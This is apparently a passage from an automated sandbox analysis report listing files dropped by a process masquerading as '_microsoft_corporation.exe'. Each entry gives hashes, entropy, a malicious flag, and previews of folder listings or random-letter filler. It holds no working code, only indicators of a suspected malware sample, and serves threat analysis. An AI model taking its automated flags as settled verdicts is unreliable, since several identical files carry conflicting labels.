                                                          SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                          MD5:D430E8A326E3D75F5E49C40C111646E7
                                                          SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                          SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                          SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                          Malicious:false
                                                          Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):24
                                                          Entropy (8bit):4.053508854797679
                                                          Encrypted:false
                                                          SSDEEP:3:jgBLKB:j4LKB
                                                          MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                          SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                          SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                          SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                          Malicious:false
                                                          Preview:Startup\...desktop.ini..
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4412
                                                          Entropy (8bit):5.287331436185008
                                                          Encrypted:false
                                                          SSDEEP:96:4jzcRPTmt6qESftmJNjbQVuLpIwrbIGVWCMk2j/JM0gu+Gwq:BtbS1mJtcU1TUKqqq
                                                          MD5:61B1BC1B3C6D4DF9921AA38120078C92
                                                          SHA1:B0C924E8052AEB9C89E1FF2874FFFF22AA19518D
                                                          SHA-256:536EEC87B1DD76E21D90E438F8621F8746D56B1C38F34162844101FDF896FA16
                                                          SHA-512:D5D3F5D12FC2F96CC9E4C30AEE91FC8EE2E190E82B23380B36CD8D771208AD03D1B29881CB09B303CA06DFEB1230A1F17C0A31F7E2D726558E9BD93D6A458507
                                                          Malicious:false
                                                          Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):23
                                                          Entropy (8bit):3.7950885863977324
                                                          Encrypted:false
                                                          SSDEEP:3:k+JrLKB:k+JrLKB
                                                          MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                          SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                          SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                          SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                          Malicious:false
                                                          Preview:Videos\...desktop.ini..
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.702896917219035
                                                          Encrypted:false
                                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                          Malicious:false
                                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694985340190863
                                                          Encrypted:false
                                                          SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                          MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                          SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                          SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                          SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                          Malicious:false
                                                          Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694985340190863
                                                          Encrypted:false
                                                          SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                          MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                          SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                          SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                          SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                          Malicious:true
                                                          Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.687722658485212
                                                          Encrypted:false
                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                          Malicious:true
                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.696250160603532
                                                          Encrypted:false
                                                          SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                          MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                          SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                          SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                          SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                          Malicious:false
                                                          Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.688284131239007
                                                          Encrypted:false
                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                          Malicious:false
                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.700014595314478
                                                          Encrypted:false
                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                          Malicious:false
                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694982189683734
                                                          Encrypted:false
                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                          Malicious:false
                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.687722658485212
                                                          Encrypted:false
                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                          Malicious:false
                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.687722658485212
                                                          Encrypted:false
